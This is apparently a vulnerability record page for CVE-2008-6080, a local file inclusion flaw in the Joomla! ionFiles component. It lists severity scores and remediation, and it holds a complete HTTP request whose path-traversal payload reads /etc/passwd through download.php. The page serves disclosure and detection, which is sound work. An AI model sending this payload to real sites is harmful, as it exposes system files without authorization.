| Title | Joomla! ionFiles 4.4.2 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. |
| Remediation | Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.06734 |
| CVE ID | CVE-2008-6080 |
| CWE ID | CWE-22 |
| Tags | cve cve2008 edb joomla lfi codecall vuln |
Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64: rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-6080.yaml
🦈 Packet Capture: ⬇️ Download cve-2008-6080.pcap
N/AN/A